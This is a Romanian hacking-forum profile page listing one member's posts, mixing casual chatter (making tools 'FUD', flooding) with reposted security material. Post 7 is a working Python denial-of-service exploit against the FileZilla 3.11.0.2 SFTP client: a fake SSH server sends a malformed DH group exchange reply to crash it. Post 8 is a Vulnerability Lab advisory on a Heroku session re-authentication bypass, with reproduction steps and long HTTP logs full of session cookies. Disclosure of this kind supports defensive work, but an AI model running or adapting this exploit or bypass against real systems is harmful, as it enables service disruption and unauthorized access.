Jump to content

KhiZaRix

Active Members
  • Posts

    245
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by KhiZaRix

  1. Mai bine ca s-a dus oferta, oportunitate pentru unii s? î?i instaleze canal de mirc sau s? dea direct cu flud.
  2. Chill ca am si eu metode sa mi-l fac FUD sau functional cu toate c? m-am l?sat de d?stea
  3. Lov u, mersi cautam de ff mult timp unul din asta
  4. B? prietene ce treab? am m? eu )) e?ti cu capul? ce m? bagi ?i pe mine în marmelad?? @STiL
  5. KhiZaRix

    Salut

    Salut , încearc? Python , perl ?i Java , dac? tot ?ti C++ ?i PHP.
  6. Din iarn? se gândeau s? pun? stagiul militar de când cu ru?i ??tia , ?i a?a armata noastr? e vai de mama ei având în vedere c? majoritatea echipamentului de lupt? e în afganistan , ?i pe lâng? asta for?ele noastre aeriene : mig 21 , crede?i c? aceste miguri fac fa?? împotriva PAK-urilor ruse?ti? în 30 de minute ru?i ne epuizeaz? ?i 4 ore v-a fi doar o parad? de-a ru?ilor cum ne ocup? ?ara .. uita?i câteva linkuri , acest scenariu este posibil numai dac? ceilal?i parteneri NATO nu intervin dar este imposibil acest lucru. Dotarea armatei române : https://ro.wikipedia.org/wiki/Echipamentul_militar_al_Armatei_Rom%C3%A2ne Dotarea armatei ruse?ti : https://en.wikipedia.org/?title=List_of_equipment_of_the_Russian_Ground_Forces Compara?ie între puteri , v? las pe voi s? decide?i: Global Firepower - 2015 World Military Strength Rankings Totu?i s? privim ?i partea bun? , la câ?i tineri cu nasul pe sus sunt în ziua de azi ... merit? acest stagiu , oricum majoritatea care au vrut stagiul sunt dispera?ii de cs , ?i cei de pe timpul lui pazvante chiorul Edit:// a înc? ceva ce caut? Americanii la noi în ?ar?? Discursuri si declaratii | Ambasada Statelor Unite Bucharest, Romania
  7. # Exploit title: filezilla 3.11.0.2 sftp module denial of service vulnerability # Date: 5-6-2015 # Vendor homepage: http://www.chiark.greenend.org.uk # Software Link: http://dl.filehorse.com/win/file-transfer-and-networking/filezilla/FileZilla-3.11.0.2.exe?st=6b87ZegIN1LDhSGAw5M4wg&e=1434351489&fn=FileZilla_3.11.0.2_win32-setup.exe # Version: 3.11.0.2 # Author: 3unnym00n # Details: # -------- # sftp module for filezilla based on putty's psftp component. # when doing the ssh dh group exchange old style, if the server send a malformed dh group exchange reply, can lead the filezilla component crash # Tested On: win7, xp # operating steps: run the py, then execute : "D:\programfile\FileZilla FTP Client\filezilla.exe" sftp://root@127.0.0.1 ''' import socket import struct soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) soc.bind(('127.0.0.1', 22)) soc.listen(1) client, addr = soc.accept() ## do banner exchange ## send server banner client.send('SSH-2.0-SUCK\r\n') ## recv client banner client_banner = '' while True: data = client.recv(1) if data == '\x0a': break client_banner += data print 'the client banner is: %s'%client_banner.__repr__() ## do key exchange ## recv client algorithms str_pl = client.recv(4) pl = struct.unpack('>I', str_pl)[0] client.recv(pl) ## send server algorithms client.send('000001b4091464f9a91726b1efcfa98bed8e93bbd93d000000596469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d736861312c6469666669652d68656c6c6d616e2d67726f757031342d736861312c6469666669652d68656c6c6d616e2d67726f7570312d73686131000000077373682d727361000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f7572323536000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f75723235360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d39360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d3936000000046e6f6e65000000046e6f6e6500000000000000000000000000000000000000000000'.decode('hex')) ## do dh key exchange ## recv dh group exchange request str_pl = client.recv(4) pl = struct.unpack('>I', str_pl)[0] client.recv(pl) ## send dh group exchange group client.send('00000114081f0000010100c038282de061be1ad34f31325efe9b1d8520db14276ceb61fe3a2cb8d77ffe3b9a067505205bba8353847fd2ea1e2471e4294862a5d4c4f9a2b80f9da0619327cdbf2eb608b0b5549294a955972aa3512821b24782dd8ab97b53aab04b48180394abfbc4dcf9b819fc0cb5ac1275ac5f16ec378163501e4b27d49c67f660333888f1d503b96fa9c6c880543d8b5f04d70fe508ffca161798ad32015145b8e9ad43aab48ada81fd1e5a8ea7711a8ff57ec7c4c081b47fab0c2e9fa468e70dd6700f3412224890d5e99527a596ce635195f3a6d35e563bf4892df2c79c809704411018d919102d12cb112ce1e66ebf5db9f409f6c82a6a6e1e21e23532cf24a6e300000001020000000000000000'.decode('hex')) ## recv dh group exchange init str_pl = client.recv(4) pl = struct.unpack('>I', str_pl)[0] client.recv(pl) ## send dh group exchange reply dh_gex_reply_msg = '\x00\x00\x02\x3c' ## pl dh_gex_reply_msg += '\x09' ## padding len dh_gex_reply_msg += '\x21' ## dh gex reply dh_gex_reply_msg += '\x00\x00\xff\xff' ## dh host key len dh_gex_reply_msg += 'A'*600 client.sendall(dh_gex_reply_msg) Source: https://dl.packetstormsecurity.net/1506-exploits/filezilla-dos.txt
  8. Document Title: =============== Heroku Bug Bounty #2 - (API) Re Auth Session Bypass Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1323 Video: http://www.vulnerability-lab.com/get_content.php?id=1336 Vulnerability Magazine: http://magazine.vulnerability-db.com/?q=articles/2015/06/09/heroku-bug-bounty-2015-api-re-auth-session-token-bypass-vulnerability Release Date: ============= 2015-06-09 Vulnerability Laboratory ID (VL-ID): ==================================== 1323 Common Vulnerability Scoring System: ==================================== 6.1 Product & Service Introduction: =============================== Heroku provides you with all the tools you need to iterate quickly, and adopt the right technologies for your project. Build modern, maintainable apps and instantly extend them with functionality from hundreds of cloud services providers without worrying about infrastructure. Build. Deploy. Scale. Heroku brings them together in an experience built and designed for developers. Scale your application by moving a slider and upgrade your database in a few simple steps. Whether your growth happens over the year or overnight, you can grow on demand to capture opportunity. Heroku (pronounced her-OH-koo) is a cloud application platform – a new way of building and deploying web apps. Our service lets app developers spend their time on their application code, not managing servers, deployment, ongoing operations, or scaling. Heroku was founded in 2007 by Orion Henry, James Lindenbaum, and Adam Wiggins. (Copy of the Vendor Homepage: https://www.heroku.com/home ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research team discovered a application-side session validation vulnerability in the official Heroku API and web-application. Vulnerability Disclosure Timeline: ================================== 2014-09-19: Researcher Notification & Coordination (Benjamin Kunz Mejri) 2014-09-20: Vendor Notification (Heroku Security Team - Bug Bounty Program) 2015-03-11: Vendor Response/Feedback (Heroku Security Team - Bug Bounty Program) 2015-06-08: Vendor Fix/Patch Notification (Heroku Developer Team) 2015-06-09: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Heroku Product: Heroku Dashboard - Web Application (API) 2014 Q3 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ An application-side re-auth session bypass vulnerability has been discovered in the official heroku API & web-application service. The vulnerability allows an attacker to request unauthorized information without the second forced re authentication module. The heroku web-service provides to all web services an expire session function that disallows to visit the page without re authentication. The dataclips page session of the editor and the postgres service allows to add for example new context. If the session expires in the main heroku web-service the user will be forced to login again. During the tests we releaved that the session of the dataclip service and editor is available even if the re-authentication service is still running. If the local attacker changes the path manually to request directly the stored context in the profile (like shown in video) he is able to bypass the security mechanism to add or request the database name. The session validation mechnism needs to provoke a refresh of the progres datasheet page or the dataclips add through editor to prevent unauthorized access after a session has been expired during the usage of the heroku service. The security risk of the re-auth session bypass vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 6.1. Exploitation of the vulnerability requires a local low privilege heroku application user account without user interaction. Successful exploitation of the vulnerability results in the evade and bypass of the re-authentication mechanism. Proof of Concept (PoC): ======================= The local re auth bypass vulnerability can be exploited by local attackers with low privilege web-application user account or by remote attackers without privlege web-application account and high user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the re-auth bypass vulnerability ... 1. Register a webpage account at the official heroku website 2. Provoke the re-auth function that pops up after several profile interaction during the time after the session expired 3. When the session is expired to do not press the re-auth function button that popup stable to all service 4. Switch back to the postgres.heroku service and add dataclips or own databases even if the session is expired to all other modules and sites Note: Even if all session are expired the user is able to request the database and the dataclips in the service without authorization 5. Successful reproduce of the session vulnerability! Video Demonstration The video demonstrates the vulnerability in the re-auth function of the heroku service which affects only the heroku service with the dataclips and databases. The session expired values also needs to be recognized in the database service and the site validation request to prevent access without re-auth to heroku itself. Exception Message: -Your session has expired --Your current session has expired or become inactive and has been terminated. ---Please log in again to continue using Dashboard. --- PoC Session Logs --- 17:55:32.218[718ms][total 718ms] Status: 303[See Other] GET https://id.heroku.com/logout Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] Request Header: Host[id.heroku.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://www.heroku.com/home] Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; rack.session=sqPL2wMwiUxRKRDIZRZpFZtpQVHNL051XZMscTdZzo85hsFiMzwNrL-ZgLLCf8llJTtLTk8ilInCKAeHek3hJ971JEcCHKfGmen-xMGjed0pjaT5KG1CKDBB-oPo5z_trM8eSSBDiLUnva-T9N6Pty3jwbNpxFYeHFG79jB1K1j-lc_-dB8tACasWzQbFPc5d-6ampRWbPJf4ZQhglDefQdPrvLEqwO5BD5uXKzT2WKvilkEqdnzzbUKXm3WD1GMWZwqsV6hkeUJMn5vbsVb32yIm1r7sWL5WxuYMvbTpEdMWcA5mDJzoc0ME_Oo0F4Sz3lhIxBhipySHAYlAiR6B7SQCocJGSCqIJckDiQ_cZ5wY8s2hmGAvL2YKGb4gZGLMR2VvJDC8AEOhbS5ofhZDrYTvEaRCFgqweI3KGFQlcie7C2AQnYFgo7UfnilQsLZEVKAZnJ_f6wy3t9a108LwzUxg5aQ27mYexe5IK3Ei2ji5BNFcphWiujvrHG4TjtQwtxfF6eZZhTurqM1Rcwle2hPfQqQlSMrEf54dh_nurL6Oyh3mMHi68mhDZm6zIaAq-GCGpx8PwNhwZ8Wp1ZjmD04fFsPKBZBA9pJ2IMuP5NBgP6dpkPuPa1MxIlDpPuz6PuK_ONBKPI-ApKey2g6_6r6dHXBZU-dBMAX9nNm16r7rEoJR4StN3ApBazWVxHDTMJdprFoMbcAYsUEsjFQBMuNMwe3GKxvFKNynwK-GWsjCxL_BMe8pZQVaW7h-qSZWydA4Pmx9VmkTdEZ7e4BXiGXZCUo6et8QyZLK4SfV4tod03s6MkB3nbWjSLEsJyo4KQSDu4jJyqP7g9nvRuJz67XHl_pTLcV2updPygb3qrlyeFZLhuXtjsDbpWHMxWjvjhX7g63QkdsCSsytKBOYNsKZu8npvW59b3U6jO-aB-ZN4hMDbogRSKRhRE1bIrN%7CbHVM61lFujhv41-3Kbdezg%3D%3D%7C90aed411ab431962695b4954963c46d29c694c5b89ee793a1654e400d0830070; _ga=GA1.3.181049422.1411214008; visitor_id36622=273629684; heroku_session=1; heroku_session_nonce=891e297c-fed0-4932-8c59-32d7d341f4dc; __utmb=148535982.59.9.1411228524365; optimizelyPendingLogEvents=%5B%22n%3Dengagement%26g%3D170873954%26u%3Doeu1411214007860r0.1948891553088572%26wxhr%3Dtrue%26t%3D1411228532074%26f%3D%22%2C%22n%3Dhttps%253A%252F%252Fwww.heroku.com%252Fhome%26u%3Doeu1411214007860r0.1948891553088572%26wxhr%3Dtrue%26t%3D1411228529309%26f%3D%22%5D] Connection[keep-alive] Response Header: Server[Cowboy] Date[Sat, 20 Sep 2014 15:55:42 GMT] Connection[keep-alive] Strict-Transport-Security[max-age=31536000] X-Frame-Options[SAMEORIGIN] X-XSS-Protection[1; mode=block] x-content-type-options[nosniff] Content-Type[text/html;charset=utf-8] Set-Cookie[heroku_session=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure heroku_session_nonce=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure rack.session=FaVrS4hqnR9mnjhckrTvVfSsfPhzKXgca1SNr8Oyr6N_-ub6c_egK8dLEHO_KeAnQB1aERkdfw_LeQdQHfDHrK-3DK91e12mqCMinL-Fsdndcdg7ZY1hyrdSQXmcs1ER5d2gkk4BeU8nn2irz9fWX7Qnwmax_MKaYj1JyCxhpwGBESHwyiMOtW0v4EAuhdDi1k31ltpEem6D7VXfj-2izYDDwNrCLOOYyifekUr2YnViziFTFcnECk7ynTFG7LrK%7CczNDqJrktR8EodaST7bDZA%3D%3D%7C855c1f5d2b8faf34a68e30535e723bfa6c2eec88e4819c36e02dba20099c14ed; path=/; expires=Mon, 20 Oct 2014 15:55:43 -0000; HttpOnly; secure] Location[https://id.heroku.com/login] Vary[Accept-Encoding] Content-Encoding[gzip] Request-Id[17eefe38-a226-46fc-8e1d-2f673d87db10] Transfer-Encoding[chunked] Via[1.1 vegur] 17:55:32.937[159ms][total 818ms] Status: 200[OK] GET https://id.heroku.com/login Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] Request Header: Host[id.heroku.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://www.heroku.com/home] Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; rack.session=FaVrS4hqnR9mnjhckrTvVfSsfPhzKXgca1SNr8Oyr6N_-ub6c_egK8dLEHO_KeAnQB1aERkdfw_LeQdQHfDHrK-3DK91e12mqCMinL-Fsdndcdg7ZY1hyrdSQXmcs1ER5d2gkk4BeU8nn2irz9fWX7Qnwmax_MKaYj1JyCxhpwGBESHwyiMOtW0v4EAuhdDi1k31ltpEem6D7VXfj-2izYDDwNrCLOOYyifekUr2YnViziFTFcnECk7ynTFG7LrK%7CczNDqJrktR8EodaST7bDZA%3D%3D%7C855c1f5d2b8faf34a68e30535e723bfa6c2eec88e4819c36e02dba20099c14ed; _ga=GA1.3.181049422.1411214008; visitor_id36622=273629684; __utmb=148535982.59.9.1411228524365; optimizelyPendingLogEvents=%5B%22n%3Dengagement%26g%3D170873954%26u%3Doeu1411214007860r0.1948891553088572%26wxhr%3Dtrue%26t%3D1411228532074%26f%3D%22%2C%22n%3Dhttps%253A%252F%252Fwww.heroku.com%252Fhome%26u%3Doeu1411214007860r0.1948891553088572%26wxhr%3Dtrue%26t%3D1411228529309%26f%3D%22%5D] Connection[keep-alive] Response Header: Server[Cowboy] Date[Sat, 20 Sep 2014 15:55:42 GMT] Connection[keep-alive] Strict-Transport-Security[max-age=31536000] X-Frame-Options[SAMEORIGIN] X-XSS-Protection[1; mode=block] x-content-type-options[nosniff] Content-Type[text/html;charset=utf-8] Set-Cookie[heroku_session=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure heroku_session_nonce=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure rack.session=HSkfR06GR1NnxhFxsmBIy0sVnJareQJv2qjGRfPXqF3Dxw-NQDVWTkf5IxbkOvB9Z8WGGhGe2f4_P7ZkiWLRnuY_mYbgteaZNCrRtb13u0v7TCQN96dgWRfbP5lSlsLzJ3A_QBzFn0LtDWiUwv1GIPgmrGvMMRRNm6k7YRgVDF1VUVKLyo4eJ57fFw6kQG6_QeSZXL2pYCnvRe779I47DXgY-VrPXUbI5Uk9Cznr49pEvkkRfb3QatvMR8el3E8QT6StkYQQEDwzL2ZYJroQXhHPMa-yHcGVoNATooiumbPXBEOM1a-fKUdJ7s56yZ9l93Ie4fVxLOUtRRtjJd-O7Sg3FLqdiNM7siMYpSD_gxh_XT3hWYbd4h5t9Xoj_zgOtxiDJlM63RchlyCtoFERag%3D%3D%7CFvfX9eXB36GDcprUj47Nrg%3D%3D%7C3212ecd5bcd6a88fd376d7bd6a58dda06d5de2e01f9b066d2dce3e441b8d09b2; path=/; expires=Mon, 20 Oct 2014 15:55:43 -0000; HttpOnly; secure] Vary[Accept-Encoding] Content-Encoding[gzip] Request-Id[6c5a1418-f70d-4eb5-901c-8b333e82d2e3] Transfer-Encoding[chunked] Via[1.1 vegur] 17:56:11.833[437ms][total 437ms] Status: 302[Found] GET https://postgres.heroku.com/databases Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] Request Header: Host[postgres.heroku.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://dataclips.heroku.com/clips/new] Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; _session_id=BAh7CEkiD3Nlc3Npb25faWQGOgZFVEkiJWU0MWEyZTc5NDc5M2Q4YTI0MDg5OTUzZjYxODNkYTc3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMVRtUk91NGFhNWZBdDVRRURTem9XRmtWZkloRkFuMldMREJDYXZHd3ltK1E9BjsARkkiD2NzcmYudG9rZW4GOwBUSSIxbjJoak5xNkRSNEdkaWlOak1JOTJ2VHB5dmtqK1NKYW8xNXBwLy9oSHhMUT0GOwBG--16c1365df04da320c8f856f41afe6b154b068da3; user_session_secret=BAhJIgHCUms1UlVXbGhSelUzZFRFd1VuRk5TMWhDU0ZWRVptMXRkVnBWVVVjeFQyaHBTWGh6VEdOc2NHWXdiVmRDWTFZMWNVdFVWMGhuUTFKSVowNW5lV3BaUjNrNE1teEtTVTlCT0RNclZDdFdTR2xHVkM5elVtYzlQUzB0U2pWaWFEbGlNM0pLVTBkSlFWSlRPRTlIUTJaaFFUMDktLTc0MTM3N2ZhOTc5ZmRiYjNmMjI2N2EzYzU1NmNlOTRkYmNjMzg2YzkGOgZFRg%3D%3D--0423c026f66ea9da3bf9c5f335ac142a95b2e819; postgres_session_nonce=891e297c-fed0-4932-8c59-32d7d341f4dc; __utmb=148535982.62.9.1411228524365] Connection[keep-alive] Response Header: Server[Cowboy] Connection[close] Date[Sat, 20 Sep 2014 15:56:22 GMT] status[302 Found] Strict-Transport-Security[max-age=99; includeSubdomains] X-Frame-Options[SAMEORIGIN] X-XSS-Protection[1] Location[https://postgres.heroku.com/login] Content-Type[text/html; charset=utf-8] x-ua-compatible[IE=Edge,chrome=1] Cache-Control[no-cache, private] Set-Cookie[_session_id=BAh7CUkiD3Nlc3Npb25faWQGOgZFVEkiJWU0MWEyZTc5NDc5M2Q4YTI0MDg5OTUzZjYxODNkYTc3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMVRtUk91NGFhNWZBdDVRRURTem9XRmtWZkloRkFuMldMREJDYXZHd3ltK1E9BjsARkkiD2NzcmYudG9rZW4GOwBUSSIxbjJoak5xNkRSNEdkaWlOak1JOTJ2VHB5dmtqK1NKYW8xNXBwLy9oSHhMUT0GOwBGSSIQcmVkaXJlY3RfdG8GOwBGIg8vZGF0YWJhc2Vz--ed40c9baff4bd3ebaeb5a84c4b9afc6831c4b2a0; path=/; secure; HttpOnly] x-request-id[3757ef00-dcc8-44e7-9413-c3d1beab8f0d] x-runtime[0.008472] x-rack-cache[miss] Via[1.1 vegur] 17:56:12.273[183ms][total 183ms] Status: 302[Found] GET https://postgres.heroku.com/login Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] Request Header: Host[postgres.heroku.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://dataclips.heroku.com/clips/new] Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; _session_id=BAh7CUkiD3Nlc3Npb25faWQGOgZFVEkiJWU0MWEyZTc5NDc5M2Q4YTI0MDg5OTUzZjYxODNkYTc3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMVRtUk91NGFhNWZBdDVRRURTem9XRmtWZkloRkFuMldMREJDYXZHd3ltK1E9BjsARkkiD2NzcmYudG9rZW4GOwBUSSIxbjJoak5xNkRSNEdkaWlOak1JOTJ2VHB5dmtqK1NKYW8xNXBwLy9oSHhMUT0GOwBGSSIQcmVkaXJlY3RfdG8GOwBGIg8vZGF0YWJhc2Vz--ed40c9baff4bd3ebaeb5a84c4b9afc6831c4b2a0; user_session_secret=BAhJIgHCUms1UlVXbGhSelUzZFRFd1VuRk5TMWhDU0ZWRVptMXRkVnBWVVVjeFQyaHBTWGh6VEdOc2NHWXdiVmRDWTFZMWNVdFVWMGhuUTFKSVowNW5lV3BaUjNrNE1teEtTVTlCT0RNclZDdFdTR2xHVkM5elVtYzlQUzB0U2pWaWFEbGlNM0pLVTBkSlFWSlRPRTlIUTJaaFFUMDktLTc0MTM3N2ZhOTc5ZmRiYjNmMjI2N2EzYzU1NmNlOTRkYmNjMzg2YzkGOgZFRg%3D%3D--0423c026f66ea9da3bf9c5f335ac142a95b2e819; postgres_session_nonce=891e297c-fed0-4932-8c59-32d7d341f4dc; __utmb=148535982.62.9.1411228524365] Connection[keep-alive] Response Header: Server[Cowboy] Connection[close] Date[Sat, 20 Sep 2014 15:56:22 GMT] status[302 Found] Strict-Transport-Security[max-age=99; includeSubdomains] X-Frame-Options[SAMEORIGIN] X-XSS-Protection[1] Location[https://postgres.heroku.com/auth/heroku] Content-Type[text/html; charset=utf-8] x-ua-compatible[IE=Edge,chrome=1] Cache-Control[no-cache, private] Set-Cookie[user_session_secret=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT; secure super_user_session_secret=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT; secure postgres_session_nonce=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT; secure] x-request-id[aab5515c-db99-4516-afb9-f81c6d7427e3] x-runtime[0.005907] x-rack-cache[miss] Via[1.1 vegur] 17:56:13.046[161ms][total 897ms] Status: 200[OK] GET https://id.heroku.com/login Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] Request Header: Host[id.heroku.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://dataclips.heroku.com/clips/new] Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; rack.session=Oj3BV4aM5iZSvASRXbZL38nzvzIIh2T_S6vdquNUi-OZ6JARZBmQ2zTzwbXj9r1M5TY2tCgCUDV6CmJzJm06aX0EH6gr2QJTjzVd64_n-FlnBUmFFLaDc_gtbPTYX3K8SsDCHAVVhA75xb6j6bvFqlPk-Ne-848PcKFchgdKGSflzC8_-Wfqqg9hppwmjdb6ia9bKqejpkXY49b0ehF8FxQp8s7etE4YxhHhvIzJqxUd3oxBjZo_F2Zoec30Cc6dRuPk5J8bocsC8_8Zq09DoZFqN_DOG41HDlbKIW1TKUtFLfCvuQ3KoE7cjM7dSdVzZZf7uehizmAGWkBPIWp-fJRoUG3L2Rpoo0VZdN_ih-BGCtGMNiFb3K4586XR9yQWMuEiikHz1yhZp_fK7oZk60Ps3vTnNi1zGxRcfW_N3ScLeVLSyHMqefqlqtVMAWqTf5qP5pbBhbPiwJKTnowmmNPx92DrmkqWD0SrdKHOVtcWrCvwmNW5dzG7zAFQ_BMFAU-1c7BDbIkTSBEI0YuSu48HuLkTAjNPJBuSLXJkj42h1MPsx3Vxz8HakjQxIJt1KirqkcQdZTlPheoKI0iYpi4V27TRMZtrb8AZh9mMtEo435snF2SDhMHSdzniCMlA7G-Ngw4EheMslTp5BsqmhIQiy0-hklsUKnMX8Hedh3g%3D%7CwHQzLOXMlHCSl_paZ8IydQ%3D%3D%7Cc627cc2ac2f61b0720781b7b15c81836840a4546ae4365f68d3c89ffd9d513d5; _ga=GA1.3.181049422.1411214008; visitor_id36622=273629684; __utmb=148535982.62.9.1411228524365] Connection[keep-alive] Response Header: Server[Cowboy] Date[Sat, 20 Sep 2014 15:56:22 GMT] Connection[keep-alive] 